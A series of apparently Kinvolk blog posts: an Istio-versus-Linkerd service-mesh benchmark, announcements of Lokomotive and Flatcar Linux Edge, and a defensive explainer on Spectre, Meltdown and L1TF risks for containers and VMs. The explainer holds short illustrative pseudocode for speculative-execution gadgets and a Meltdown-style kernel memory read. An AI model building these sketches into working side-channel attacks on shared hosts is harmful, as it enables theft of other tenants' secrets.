For evaluating performance we look at latency distribution (histograms), specifically at tail latencies in the highest percentiles. This is to reflect this benchmark’s focus on user experience: a typical web page or web service will require more than one, possibly many, requests to perform a single user action. If one request is delayed, the whole action gets delayed. What’s p99 for individual requests thus becomes significantly more common in more complex operations, e.g. a browser accessing all the resources a web page is made of in order to render it - that’s why p99 and higher percentiles matter to us.

Resource Consumption

Nothing comes for free - using a service mesh will have a cluster consume more resources for its operation, taking resources away from business logic. In order to better understand this impact we measure both CPU load of, and memory consumed by the service mesh control plane, and the service mesh’s application proxy sidecars. CPU utilization and memory consumption are measured in short intervals on a per-container level during test runs, the maximum resource consumption of components during individual runs is selected, and the median over all test runs is calculated and presented as a result.

We observed that memory consumption peaks at the end of a benchmark run. This is expected, since (as outlined above) wrk2 issues a constant throughput rate - load will pile up when latency increases over a certain threshold - so memory resources, once allocated, are unlikely to be freed until the benchmark is over. CPU utilization per time slice also stayed at high levels and never broke down during runs.

Benchmark Set-up

The Cluster

We use automated provisioning for our test clusters for swift and easy cluster set-up and teardown, allowing for many test runs with enough statistical spread to produce robust data.

For the benchmarks run during our service mesh performance evaluation, we used a cluster of 5 workers. Each worker node sports a 24 core / 48 thread AMD EPYC(r) CPU at 2.4GHz, and 64 GB of RAM. Our tooling allows for a configurable number of nodes, allowing for re-running these tests using different cluster configurations.

Load is generated and latency is measured from within the cluster, to eliminate noise and data pollution from ingress gateways - we’d like to fully focus on service meshes between applications. We deploy our load generator as a pod in the cluster, and we reserve one cluster node for load generation / round-trip latency measurement, while using the remaining four nodes to run a configurable number of applications. In order to maintain sufficient statistical spread, we randomly pick the “load generator” node for each run.

One random node is picked before each run and reserved exclusively for the load generator. The remaining nodes run the application under load.

For the purpose of this test we used Packet as our IaaS provider; the respective server type used for worker nodes is c2.medium. Packet provides “bare metal” IaaS - full access to physical machines - allowing us to eliminate neighbour noise and other contention present in virtualized environments.

Cluster Applications

As discussed in the “Metrics” section above, we use wrk2 to generate load, and augment the tool to allow benchmarks against multiple HTTP endpoints at once.

The application we use to run the benchmark against is “Emojivoto”, which comes as a demo app with Linkerd, but is not related to Linkerd functionality, or to service meshes in general (Emojivoto runs fine without a service mesh). Emojivoto uses a HTTP microservice by the name of web-svc (of kind: load-balancer) as its front-end. web-svc communicates via gRPC with the emoji-svc and voting-svc back-ends, which provide emojis and handle votes, respectively. We picked Emojivoto because it is clear and simple in structure, yet contains all elements of a cloud-native application that are important to us for benchmarking service meshes.

The emojivoto application consists of 3 microservices.

However, benchmarking service meshes with only a single application would be a far cry from real-world use cases where service meshes matter - those are complex set-ups with many apps. In order to address this issue yet keep our set-up simple, we deploy the Emojivoto app a configurable number of times and append a sequence counter to service account and deployment names. As a result, we now have a test set-up that runs web-svc-1, emoji-svc-1, voting-svc-1 alongside web-svc-2, emoji-svc-2, voting-svc-2, etc. Our load generator will spread its requests and access all of the apps’ URLs, while observing a fixed overall rps rate.

Looping over the deployment yaml and appending counters to app names allows us to deploy a configurable number of applications.

On Running Tests and Statistical Robustness

As we are using the datacenters of a public cloud provider - Packet - to run our benchmarks, we have no control over which specific servers are picked for individual deployments. The age of the machine and its respective components (memory, CPU, etc), its position in the datacenter relative to the other cluster nodes (same rack? same room? same fire zone?), and the state of the physical connections between the nodes all have an impact on the raw data any individual test run would produce. The activity of other servers unrelated to our test, but present in the same datacenter, and sharing the same physical network resources, might have a derogatory effect on test runs, leading to dirty benchmark data. We apply sufficient statistical spread with multiple samples per data point to eliminate volatile effects of outside operations on the same physical network when comparing data points relative to each other - i.e. Istio’s latency and resource usage to Linkerd’s. We furthermore use multiple clusters in different datacenter with implicitly different placement layouts to also help drawing absolute conclusions from our data.

In order to achieve sufficient statistical spread we execute individual benchmark runs twice to derive average and standard deviation. We run tests in two clusters of identical set-up in parallel to make sure our capacity does not include a “lemon” server (degraded hardware) or a bad switch, or has nodes placed at remote corners in the datacenter.

A typical benchmark test run would consist of the following steps. These steps are run on two clusters in parallel, to eliminate the impact of “lemon” servers and bad networking.

=> Before we start, we reboot all our worker nodes.

=> Then, for each of “istio-stock”, “istio-tuned”, “linkerd”, “bare”, do, on 2 clusters simultaneously:

  1. Install the service mesh (skip if benchmarking “bare”, i.e. w/o service mesh)
  2. Deploy emojivoto applications
  3. Deploy benchmark load generator job
  4. Wait for the job to finish, while pulling resource usage metrics every 30 secs
  5. Pull benchmark job logs which contain latency metrics
  6. Delete benchmark load generator job and emojivoto
  7. Uninstall service mesh
  8. Goto 1. to benchmark the next service mesh (linkerd -> istio -> bare)
  9. After all 4 benchmarks concluded, start again with the first service mesh,
    and run the above twice to gain statistical coverage


We provisioned the clusters using Kinvolk’s recently announced Kubernetes distribution, Lokomotive. The code for automating both the provisioning of the test clusters as well as for running the benchmarks is available under an open source license in the Github repo. This is to allow for reproducing the benchmark results and hopefully accepting improvements from others.

As mentioned above, we are also releasing our extensions to wrk2, available here: .

Benchmark runs and observations

We benchmarked “bare” (no service mesh), “Istio-stock” (without tuning), “Istio-tuned”, and “Linkerd” with 500 requests per second, over 30 minutes. Benchmarks were executed twice successively per cluster, in 2 clusters - leading to 4 samples per data point. The test clusters were provisioned in separate data centers in different geographical regions - one in Packet’s Sunnyvale datacenter, and one in the Parsippany datacenter in the New York metropolitan area.

Service mesh versions used

Istio - “stock” and “tuned”

We ran our benchmarks on Istio release 1.1.6, which was current at the time we ran the benchmarks. We benchmarked both the “stock” version that users would receive when following the evaluation set-up instructions (update: a warning has been added to the evaluation instructions following the initial release of this blog post; see details below) as well as a “tuned” version that removed memory limitations and disabled a number of Istio components, following various tuning recommendations. Specifically, we disabled Mixer’s Policy feature (while leaving telemetry active to retain feature parity with Linkerd), and disabled Tracing, Gateways, and the Prometheus add-on configuration.

Update 2019-05-29 @mandarjog and @howardjohn reached out to us via a github issue filed to the service mesh benchmark project, raising that:

  • The “stock” Istio configuration, while suitable for evaluation, is not optimized for performance testing.
  • The “tuned” Istio configuration was still enforcing a restrictive CPU limit in one case.
    • We removed the limitation and increased the limits in accordance with suggestions we received in the github issue.
    • We re-ran a number of tests but did not observe significant changes from the results discussed below - the relations of bare, Linkerd, and Istio latency remained the same. Also, Istio continued to expose latencies in the minute range when being overloaded at 600rps. Please find the re-run results in the github issue at .


We used Linkerd’s Edge channel, and went with Linkerd2-edge-19.5.2, which was the latest Linkerd release available at the time we ran the benchmarks. We used linkerd as-is, following the default set-up instructions, and did not perform any tuning.

Gauging the limits of the meshes under test

Before we started our long-running benchmarks at constant throughput and sufficient statistical spread, we gauged throughput and latency of the service meshes under test in much shorter runs. Our goal was to find the point of load where a mesh would still be able to handle traffic with acceptable performance, while under constant ongoing load.

For our benchmark set-up with 30 Emojivoto applications / 90 microservices - averaging 7.5 apps, or 22 microservices, per application node - we ran a number of 10 minute benchmarks with varying RPS to find the sweet spot described above.

Individual benchmark run-time

Since we are most interested in the upper tail percentiles, the run-time of individual benchmark runs matters. The longer a test runs, the higher are the chances that increased latencies pile up in the 99.9999th and the 100th percentile. To both reflect a realistic “user stampede” as well as its mitigation by new compute resources coming live, we settled for a 30 minutes benchmark run-time. Please note that while we feel that new resources, particularly in auto-scaled environments, should be available much sooner than after 30 minutes, we also believe 30 minutes are a robust safety margin to cover unexpected events like provisioning issues while autoscaling.

Benchmark #1 - 500RPS over 30 minutes

This benchmark was run over 30 minutes, with a constant load of 500 requests per second.

Latency percentiles

Logarithmic Latency (in milliseconds) for 500 requests per second

We observed a surprising variance in the bare metal benchmark run, leading to rather large error bars - something Packet may want to look into on the occasion. This has a strong effect on the 99.9th and the 99.999th percentile in particular - however, overall tendency is affirmed by the remaining latency data points. We see Linkerd leading the field, and not much of a difference between stock and tuned istio when compared to Linkerd. Let’s look at resource usage next.

Memory usage and CPU utilization

We measured memory allocation and CPU utilization at their highest point in 4 individual test runs, then used the median and highest/lowest values from those 4 samples for the above charts. The outlier sample for Linkerd’s control plane memory consumption was caused by a linkerd-prometheus container which consumed twice the amount of memory as the overall Linkerd control plane did on average.

With Istio, we observed a number of control plane containers (pilot, and related proxies) disappear during the benchmark runs, in the middle of a run. We are not entirely certain on the reasons and did not do a deep dive, however, we did not include resource usage of the “disappearing containers” at all in our results.

Benchmark #2 - 600RPS over 30 minutes

This benchmark was run over 30 minutes, with a constant load of 600 requests per second.

Latency percentiles

Logarithmic Latency (in milliseconds) for 600 requests per second

We again observe strong variations of bare metal network performance in Packet’s datacenters; however, those arguably are less impacting on the service mesh data points compared to the 500rps benchmark. We are approaching the upper limit of acceptable response times for linkerd, with the maximum latency measured at 3s in the 100th percentile.

With this load, Istio easily generated latencies in the minutes range (please bear in mind that we use a logarithmic Y axis in the above chart). We also observed a high number of socket / HTTP errors - affecting 1% to 5.2% of requests issued, with the median at 3.6%. Also, we need to call out that the effective constant throughput rps rate Istio was able to manage at this load was between 565 and 571 rps, with the median at 568 rps. Istio did not perform 600rps in this benchmark.

Update 2019-05-28: We would like to explicitly call out that Istio clusters would have scaled out long before reaching this point -therefore the minutes latency does not reflect real-world experiences of Istio users. At the same time, it is worth noting that, while Istio is overloaded, Linkerd continues to perform within a bearable latency range, without requiring additional instances or servers to be added to the cluster.

Memory usage and CPU utilization

While the above charts imply a bit of an unfair comparison - after all, we’re seeing Linkerd’s resource usage at 600rps, and Istio’s at 570rps - we still observe an intense hunger for resources on the Istio side. We again observed Istio containers disappearing mid-run, which we ignored for the above results.


Both Istio and Linkerd perform well, with acceptable overhead at regular operating conditions, when compared to bare metal. Linkerd takes the edge on resource consumption, and when pushed into high load situations, maintains acceptable response latency at a higher rate of requests per second that Istio is able to deliver.

Future Work

With our investment in automation to perform the above benchmarks, we feel that we created a good foundation to build on. Future work will focus on extending features and capabilities of the automation, both to improve existing tests and to increase coverage of test scenarios.

Most notably, we feel that limiting the benchmark load generator to a single pod is the largest limitation of the above benchmark tooling. This limits the amount of traffic we can generate to the physical machine the benchmark tool runs on in a cluster. Overcoming this limitation would allow for more flexible test set-ups. However, running multiple pods in parallel poses a challenge when merging results, i.e. merging the “HDR Histogram” latency statistics of individual pods, without losing the precision we need to gain insight into the high tail percentiles.

Driving Kubernetes Forward with Lokomotive

Over the past few years, Kinvolk has been fortunate to work with some of the leading names in the industry on some of the most interesting projects in the cloud-native space. This work has without exception relied on our team’s deep knowledge of Linux, containers, Kubernetes and how these all work together. Our team’s rare ability to affect every layer of the Kubernetes stack has provided technology-spanning benefits and the driving motivations for our next steps.

With that background, today we are announcing Lokomotive, a full-stack Kubernetes distribution with three overarching goals:

  • Be a secure, stable and dynamic Kubernetes distribution: First and foremost, Lokomotive is made to be production-ready, meaning it delivers on the fundamental qualities organizations require to entrust their business-critical workloads.
  • Drive cutting-edge Linux technologies into Kubernetes: Lokomotive will be our engine to drive the cutting-edge technologies delivered by Flatcar Linux Edge into Kubernetes. Currently this includes Linux 5.1, cgroup v2, Wireguard, new BPF features, OCI hooks integration with BPF, and more. This will ensure that Lokomotive is positioned to be the first Kubernetes distribution to take advantage of such features.
  • Deliver production-grade, completely open sourced product: Kinvolk was founded on our belief that open source is the best way to develop software and drive innovation. We have done that through our community contributions and commercial engineering services. We will continue to be true to our open source ethos as we offer commercial support for Lokomotive, Flatcar Linux and future products.

What is Lokomotive?

Lokomotive is a Kubernetes distribution inspired by CoreOS Tectonic and built to run atop Flatcar Linux. Like Tectonic, Lokomotive is a self-hosted Kubernetes, meaning the Kubernetes components run in containers managed by Kubernetes itself, taking advantage of Kubernetes’ built-in scaling and resiliency features.

The main Lokomotive repository is a fork of former CoreOS engineer Dalton Hubble’s Typhoon project. Through his efforts, Lokomotive starts with a stable foundation upon which we build.

Platform support currently includes AWS, Azure, Baremetal, GCE and Packet. Others will be added over time.


The main entry point of Lokomotive is lokoctl, the Lokomotive installer. lokoctl packages the entire Lokomotive install experience into an easy to use binary. Configuration is done using HCL-based configuration files. lokoctl development is ongoing and it will be made available by the time full commercial support of Lokomotive is announced.

Lokomotive Components

Lokomotive aims to include the necessary components needed for production Kubernetes deployments. For this we have Lokomotive Components. Lokomotive Components provide all the cluster elements needed before applications are deployed: monitoring, ingress, logging, networking, storage, service mesh, authentication provider, etc. With this approach, we also ensure we deliver a secure configuration out-of-the-box, including secure default settings, authentication, and certificate management. Cluster settings and Components are configured via declarative HCL-based configuration files ensuring a consistent, fully automatable cluster creation process and the ability to treat individual clusters as disposable, easily replicated deployment artifacts.

We’ll be revealing more details about Lokomotive at the same time that we announce full commercial support availability.

What’s next for Lokomotive?

Today we are opening up the first seeds of Lokomotive. A fully supported Lokomotive release with lokoctl and Lokomotive Components will be available this summer.

These first seeds provide a solid base Kubernetes experience. But our main motivation at this point is to start pushing cutting-edge Linux technologies into Kubernetes, leveraging Flatcar Linux Edge. Thus, over the next few months, you can expect Lokomotive to be used to demonstrate some of the new ideas we’d like to see in Kubernetes.

Client-driven development

With production Lokomotive clusters serving hundreds of thousands of requests per second of business-critical traffic, we already know Lokomotive is a stable and reliable technology. We are now working with clients to improve the Lokomotive user experience in preparation for general availability.

If you are looking to have a solid Kubernetes platform and work with experts to drive new technologies forward, please reach out at [email protected] or via IRC (Freenode #lokomotive-k8s).


Introducing the Flatcar Linux Edge Channel

Today, Kinvolk is making available a new channel to Flatcar Linux, Flatcar Linux Edge. This channel serves to deliver experimental Linux OS technologies to the Kubernetes developer community in an easily accessible manner. The goal is to accelerate the adoption of cutting-edge Linux technologies in Kubernetes and related projects.


First announced just over a year ago, Flatcar Linux is Kinvolk’s drop in replacement for CoreOS’ Container Linux. There were two main reasons we decided to initiate the fork. Firstly, we believe the technology is sound and valuable. Secondly, we saw the potential for using Flatcar Linux as a means of driving innovative Linux technologies into Kubernetes and the wider cloud native ecosystem. With the Flatcar Linux Edge channel we are now executing on this second point by providing a channel that delivers cutting edge Linux technologies in an easily accessible manner.

What is Flatcar Linux Edge?

Flatcar Linux Edge is an experimental Linux distribution for containers delivered as an additional channel alongside the existing stable, beta, and alpha channels. While the existing channels are intended to serve as a delivery process for stable releases, the edge channel delivers experimental features not intended for production environments. Rather, the edge channel is intended to serve as a common platform for the cloud native and Kubernetes community to experiment with new Linux OS technologies.

The Flatcar Linux Edge channel differs in several key aspects that set it apart from the existing channels. For example, the edge channel

  • lives independent of the standard channel flow; changes are not necessarily expected to flow into any of the other channels.
  • features are not stable and may come and go. Only features with maintainers will be accepted and unmaintained features will be removed. These changes will be included in the release notes.
  • is in no way supported. The other channels are part of Kinvolk’s Flatcar support coverage, the edge channel will not be.

What’s in the initial channel release?

The first release of the Flatcar Linux Edge channel includes the following collection of enhancements, including those needed to demonstrate upcoming BPF tools the Kinvolk team will be highlighting in follow-up posts. These initial features are…

  • Wireguard a fast and modern in-kernel VPN technology
  • cgroups v2 enabled by default on the system and in container workloads
  • cri-o a container runtime built for Kubernetes
  • some hardcoded OCI hooks to ease experimentation in Kubernetes
  • additional tools installed on the host, available to aforementioned OCI hooks: bpftool, cgroupid

Ideas for future inclusion

In the future, we’d like to see support for

These are just the things we at Kinvolk have thought of. We’re looking forward to seeing what kind of things the community would like to add.

Why Flatcar Linux Edge?

At Kinvolk we frequently work on cutting-edge Linux technologies that are not yet available in conventional Linux distributions. In doing so, we spend a good amount of time setting up and configuring systems; compiling kernels, patching software and configurations, etc. With edge we want others to benefit from this effort and also provide the community a platform to deliver and experiment with such technologies. We think Flatcar Linux Edge can be the platform for driving innovative features into Kubernetes and related tooling.

Get involved!

As an unstable, experimental channel, the barrier of getting a feature in is decidedly low. The only requirement is that you commit to maintaining that feature or see it removed in future releases. So if you have ideas, get in touch.

Hardware vulnerabilities in cloud-native environments

The Spectre/Meltdown family of information disclosure vulnerabilities—including the more recent L1 Terminal Fault (aka “Foreshadow”)—are a new class of hardware-level security issues which exploit optimizations in modern CPUs that involuntarily leak information. This potentially has a subtle impact on container workloads, particularly in a virtualized environment. This post will look at the individual OS abstraction levels of a generic container stack, and discuss risks and mitigations in a variety of scenarios. Let’s start with describing what we’ve labelled “generic container stack” above. We’ll use this model throughout the document to illustrate various threat scenarios. Whether we operate our own infrastructure (bare metal, VMWare, OpenStack, OpenNebula, etc.), or are customers of an IaaS (GCE, EC2) or PaaS (GKE, AKS) offering, we should know the implications of Spectre/Meltdown to the stack we are using. This will allow us to ensure the security of our cluster, be it through direct action, or through qualified inquiries to our service providers. Meet our stack:

At the lowest level is your application, as our smallest - atomic - unit.

Typically, we deal with individual applications running with container isolation. Nothing much changes in our picture so far.

To run workloads in parallel, operators may opt to put a number of containers into a sandbox, most commonly a virtual machine. Virtualization, apart from isolation, also abstracts from the hardware level, easing maintenance operations. Some implementations skip this virtualization layer - we’ll look at the implications (not necessarily negative) further below.

IaaS operators aim to consolidate their physical hardware, so bare metal hosts are filled with a number of sandboxes to saturate CPU and I/O.

While sandboxing traditionally isolates containers from traditional attacks that exploit flaws in applications’ implementations, the underlying physical host’s CPU introduces new attack vectors.

Now that we have a mental model of our target environment, let’s consider the actual class of attacks we’re dealing with. Spectre, Meltdown et al. are a new category of security vulnerabilities that exploit side effects of CPU optimizations for code execution and data access. Those optimizations—speculative execution of instructions—were originally meant to run hidden, without any user-visible impact on CPU execution states. In 2018, the general public learned that there are indeed observable side effects, exploitable by priming a CPU’s speculative execution engine. This creates a side channel for the attacker to draw conclusions on the victim’s workload and data.

While we will only briefly discuss the attacks, Jon Masters’ presentation and slides on Spectre/Meltdown provide an excellent and thorough introduction.

The family of attacks work against applications that run on the same core as well as applications running on the other sibling of a hyperthreaded core. It requires exploitable segments suitable for leaking information (“gadgets”) in the victim’s code. Overall, the family of hardware information disclosure vulnerabilities, so far, includes:

  • v1, the original
  • v2, with branch prediction priming independent from the code attacked
  • v3 and v3a aka “Meltdown”
  • v4, bypassing stores and leaking “scrubbed” memory
  • Level 1 Terminal Fault, or “Foreshadow”

How does this work?

Imagine you have a “shadow CPU” that mimics your real one. To be precise, the shadow only executes load and store memory instructions but no arithmetic instructions. Shadow executes loads from memory before your real CPU gets to see those load instructions, while the real CPU is busy performing arithmetic instructions. Shadow loads very aggressively even in cases where it is likely, but not guaranteed, that the load is even necessary. Its motivation is to make data available in the CPU caches (fast access) instead of making the real CPU walk to memory (orders of magnitude slower). Eventually, the execution flow of the real CPU arrives at where the shadow already is - and the data it needs is readily available from the CPU caches. If the shadow CPU was wrong with its speculation, there’s no harm done since values in the cache cannot be read. Harm is done though when code uses the data loaded to calculate an address in a follow-up load instruction:

if (offset < uper_bound_of_memory_allowed_to_access) {    // attack uses offset > allowance
  char secret_data = *(char *)(secret_memory_ptr+offset); // never reached by “real” CPU
  unsigned long data2 = my_own_array[secret_data];        // never reached by “real” CPU
// TODO: use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal “secret_data”.

Spectre - the keyhole

The Spectre family of attacks—which includes Meltdown, discussed below—allow an unprivileged attacker to access privileged memory through speculative execution. Privileged memory may be OS (kernel) memory of its own process context, or private memory belonging to another application, container, or VM.

Spectre v1

The attack works by first training the branch predictor of a core to predict that specific branches are likely to be taken. A branch in this case is a program flow decision that grants or denies execution of sensitive code based on a value provided by the attacker—for instance, checking if an offset is within a legally accessible memory range. Branch predictor priming is achieved by performing a number of “legal” requests using valid offsets, until the branch predictor has learned that this branch usually enters the sensitive code. Then, the attacker attempts an illegal access as outlined above which will be denied. ut at that point, the speculative execution engine will have executed the access, using an illegal offset, and contrary to its design goal can be forced to leave an observable trace in the core’s cache. The sensitive code is speculatively executed because the branch predictor has seen that branch go into the sensitive code so many times before. But we cannot access the cache, so what gives?

The attacker’s code, while incapable of accessing the privileged data directly, may use it in a follow-up load operation, e.g. as an offset to load data from valid memory. Both reading the privileged data (I) and accessing a place in the attacker’s valid memory range using that privileged data as an offset (II) will be speculatively executed. After the illegal access has been denied, the attacker checks which memory offset from (II) is now cached. This will reveal the offset originating from (I), which reveals the privileged data.

Spectre v2

Spectre v2 builds on the fact that for indirect branches the branch predictor uses the branch target’s memory addresses to keep track of probabilities for indirect branches, and that it uses the virtual addresses of branch targets. The attacker can thus train the branch predictor to speculatively execute whatever is desired by crafting an environment that’s reasonably similar to the victim code in the attacker’s own virtual address space. This means the attacker can prime the branch predictor without ever calling the actual victim code. Only after priming is finished will the victim code be called, following a scheme similar to v1 to extract information. This lowers the restrictions of Spectre v1 with regard to exploitable victim code and makes the Spectre attack more generic and flexible.

Attacker Code:

if (my_offs < my_value) {   // branch located at a similar vmm address as 
  nop;                      // the code we later attack; we run this branch often, 
}                           // w/ legal offset, until priming completed

Victim Code (“gadget”):

if (offset < uper_bound_of_memory_allowed_to_access) {	  // victim code, called ONCE, w/ bad
  char secret_data = *(char *)(secret_memory_ptr+offset); // offset - “real” doesn’t branch
  unsigned long data2 = my_own_array[secret_data];        // but “shadow” already spoiled cache
// TODO: use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal “secret_data”.

Spectre v4 and the SPOILER attack

While v3 is discussed below, Spectre v4 only works when the attacker’s code runs in the same address space as the victim code, but with some extra features. Spectre v4 leverages the fact that speculative reads may return “old” memory contents that have since been overwritten by a new value, depending on the concrete CPU series’ implementation of speculative reads. This allows “uninitialized” memory to be recovered for a brief amount of time even after it was overwritten (e.g. with zeroes). Concrete applications of Spectre v4 include recovering browser state information from inside a browser’s javascript sandbox, or recovering kernel information from within BPF code.

SPOILER, a recently disclosed attack, makes extended use of speculative read and write implementations and the fact that only parts of the actual virtual memory address are being used by the speculative load/store engine. The engine would consider two different addresses to be the same because it does not consider the whole of the address, leading to false positives in dependency hazard detection. SPOILER leverages this to probe the virtual address space, ultimately enabling user space applications to learn about their virtual->physical address mapping. Since the advent of ROWHAMMER, which lets attackers flip DRAM memory bits by aggressively writing patterns in neighboring memory rows, virt->phys mappings are considered security sensitive. Consequently, SPOILER, after learning about its address mapping, applies ROWHAMMER and can this way change memory contents without accessing it.

Meltdown (Spectre v3) - the open door

Meltdown is a variant of Spectre that works across memory protection barriers (Spectre v3) as well as across CPU system mode register protection barriers (Spectre v3a). While v1 and v2 limit the attack to memory that’s valid in at least the victim’s process context, Meltdown will allow an attacker to read memory (v3) and system registers (v3a) that are outside the attacker’s valid memory range. Accessing such memory under regular circumstances would result in a segmentation fault or bus error. Furthermore, Meltdown attacks do not need to involve priming branch predictors - these go straight to the price of reading from memory that should be inaccessible. For illustration, the following construct will allow arbitrary access of memory mapped into the address space of the application—for instance, kernel memory where a secret is stored that should be inaccessible to user space:

char secret_data = *(char *)(secret_kernel_memory_ptr); // this will segfault
unsigned long data2 = my_own_array[secret_data];        // never reached, b/c segfault
// TODO: catch and handle SIGSEGV
// then use cache timing measurement to figure out which index of “my_own_array” was loaded
// into cache by “shadow”. This will reveal secret_data.

The Meltdown attack is based on lazy exception checking in the implementation of speculative execution in most Intel CPUs since 2008 (newer series initially released in 2019 and newer should work around this issue), as well as some implementations of ARM CPUs. When speculatively executing code, exceptions are not generated at all (making the speculative execution engine more lightweight). Instead, the exception check only happens at speculation retirement time, i.e. when the speculation meets reality and is either accepted or discarded.

With Meltdown—and contrary to Spectre v1 and v2—an attacker can craft their own code to access privileged memory (e.g. kernel space) directly, without requiring a suitable privileged function (“gadget”) to exist on the victim’s side.

Level 1 Terminal Fault - the (virtual) walls come down

L1TF once more leverages a CPU implementation detail of the speculative execution engine and also does not rely on branch prediction, so it is pretty similar to Meltdown. It works across memory boundaries and it bypasses virtualization. In fact, an L1TF attack is most powerful when attacking a bare metal host from within a virtual machine of which the attacker controls the kernel. The most basic L1TF attack would have an attacker’s application allocate memory, then wait for the memory pages to be swapped to disk—which will have the kernel’s memory management flip the “invalid” bit in the respective page’s control structure. The “invalid” bit in those control structures—which are shared between the kernel and the CPU’s hardware memory management unit—should cause two things: the page table entry being ignored by the CPU, and the kernel fetching data from disk back into physical memory if the page is accessed. However, in some implementations of speculative execution (most Intel CPUs from 2008 - 2018), the “invalid” bit is ignored.

When the attacker now reads from memory on that swapped-out page, the speculative execution engine will access actual memory content of a different process, or of the kernel (the content that replaced the attacker’s page after it was swapped to disk), and the attacker can easily retrieve those values by using it as an offset for an operation on their own (not swapped) memory, and then measuring access timings to figure out which value was cached. While this attack is reasonably difficult to mount from an application—the attacker has no control of either the page addresses or when/if the pages are swapped out—it becomes all the worse when mounted from inside a VM.

Inside a (otherwise unprivileged) VM controlled by an attacker, the VM may leverage a CPU mechanism called Extended Page Tables (EPT). EPT allows hosts to share memory management work with guests. This results in a significant performance boost for the virtual memory management, while allowing an attacker to craft suitable page table entries and mark those invalid directly, bypassing the restrictions of the basic attack described above. A malicious VM exploiting L1TF would be able to read all of its physical host’s memory, including the memory of other guests, with relative ease.

Attack Scenarios

After refreshing our memory on the mechanisms exploited to leak information via otherwise perfectly reasonable optimizations, we’ll go ahead and see how we can apply these attacks to the generic container stack we’ve built in the introduction (which, if you just worked your way through the attack details, must feel like ages ago).

Operating System level

This applies to a scenario where containers are run on bare metal, on a container-centric OS. The OS provides APIs and primitives for deploying, launching, managing, and tearing down containerized applications. Potential victims leaking information to a rogue application would be its own container control plane, the OS part of its process context, and other containers running on the same host. In order to ensure confidentiality, the container OS is required to ship with the latest security patches, and compiled with Retpoline enabled (a kernel build time option).

Furthermore, it would need to have run-time mitigations enabled - IBRS, both (kernel+user space) for Spectre v2, page table isolation (PTI) for Meltdown, store bypass disable (kernel+user space) for Spectre v4, and Page Table Entry Inversion (PTE Inversion) for L1TF.

IBRS is a bit Intel introduced to the machine specific register set of their CPUs.

Security-focused Linux container OSs like Flatcar Linux enable such measures by default. In order to further secure the container control plane from being spied on by its own application, the control plane and accompanying libraries need to be compiled in a way that emits protective instructions around potential Spectre gadgets (e.g. -mindirect-branch=thunk, -mindirect-branch-register, -mfunction-return=thunk for gcc).

Virtualization environments

Virtualization environments suffer from an additional vector of attack that makes it significantly easier for the attacker to craft page mappings that exploit L1TF, if the attacker is able to gain control of the guest kernel. We classify virtualization environment in two categories.

Restricted Virtualization environments (“no root”, unprivileged containers)

Restricted virtualization environments, while providing virtualization services to container clusters, restrict access of the virtualization guest - unprivileged users are used for running workloads, and the guest OS kernel cannot be changed by a third party. This approach requires that the operator remains in full control over both VMs and VM guest kernels at any point in time.

Appropriate monitoring needs to be in place to ensure that a malicious application does not break out of its unprivileged container and subsequently receives access rights to mutate kernel code. e.g. by loading custom kernel modules or even booting into a custom kernel. This would ultimately allow attackers to work around the PTE inversion restriction in particular, but with significant security impact.

With full control over VM and instance kernels, the Operating System level mitigations discussed in the previous section will secure the stack.

Unrestricted Virtualization environments (“got root”, privileged containers)

Unrestricted virtualization environments, even when not “officially” allowing for custom kernels, provide root access to 3rd parties and therefore are at risk of mutating changes to the kernel anyway, such as rogue module loads, or even booting a custom kernel. This will allow an attacker to craft custom page table entries, greatly enhancing the impact of the L1TF attack in particular.

From here on, working around those hardware vulnerabilities will hurt performance.

Keeping control of the guest kernel

Before we discuss mitigations for a scenario where we don’t control the guest kernel, let’s have a look at our options for securing control even in privileged environments. This mitigation ensures that the VM kernel cannot be modified—e.g. through loading a kmod—or otherwise mutated, even with VM root access available. A technical way to hide access to the VM kernel provided by some virtualization systems (most notably qemu) is to use direct kernel boot—that is, starting the guest with a kernel that is not on the VM filesystem image, but present on the bare metal virtualization host and is provided to the hypervisor when a VM is started. Since VMs do not have access to host file systems, the VM kernel cannot be modified even if VM root access is available. This approach would require the operator to provide and to maintain custom Linux kernel builds tailored for their infrastructure. Kernel module signing may be leveraged to guarantee “legal” kernel modules can still be loaded. Security in this scenario may be supported by operationalising direct kernel boot with the virtualization stack—i.e. booting the VM into a kernel supplied on the bare metal host instead of from the instance’s file system image, locking down loading of modules (monolithic kernel, or kmod signing), and removing kexec support. Security focused distributions like Flatcar Linux are working towards enabling locked-down kernel configurations like the above.

With the guest kernel remaining firmly under the control of the operator, Operating System level mitigations like PTE inversion (which cannot be worked around from inside the VM’s user space) will once more secure the system.

Pinning VM CPUs (vCPUs) to physical CPUs (pCPU)

In order to have VMs of varying trust levels continue to share the same physical host, we might investigate ensuring that VMs never share the same L1 cache. The technical way to achieve this is vCPU -> pCPU pinning. In this scenario, virtualization workloads must not be CPU over-committed - one virtual CPU equals one physical CPU, and each physical CPU serves the same VM. Application level over-commitment, i.e. running more applications (or containers) inside of a VM than there are CPUs, may be applied to saturate system usage. Alternatively, VMs may be grouped by trust level, and the virtual cores of VMs of the same trust level may be pinned to the same group of physical CPUs. When the guest kernel cannot be controlled and we therefore need to anticipate attacks from the VM kernel, we need to secure the physical host’s OS as well as other VMs running on the same host. L1TF attacks mounted from VM kernels have significantly higher impact than malicious user space applications trying to leverage L1TF. Specific hardware acceleration in a CPU’s memory management unit—EPT from above—allows guests to manage its page tables directly, bypassing the host kernel. EPT, while providing a significant speed-up to VM memory management, poses a potential security risk for the bare metal host’s OS, as page table entries suitable for exploiting L1TF can be crafted directly.

First, we need to take a step back though and reconsider sandboxing as in this scenario containers in the same VM cannot be considered isolated anymore. Isolation now happens solely at the VM level, implying that only containers of the same trust level may share a VM—which is likely to cause repercussions on a clusters’ hardware saturation and maintenance operations. With CPU pinning, a host’s CPUs are statically partitioned into “VM slots”, and there’s a maximum number of VMs that can run on a host to ensure CPUs are never shared between VMs (or between trust levels). CPU pinning allows guest OS kernels to be in control of 3rd parties without impacting the security of other VMs running on the same physical host.

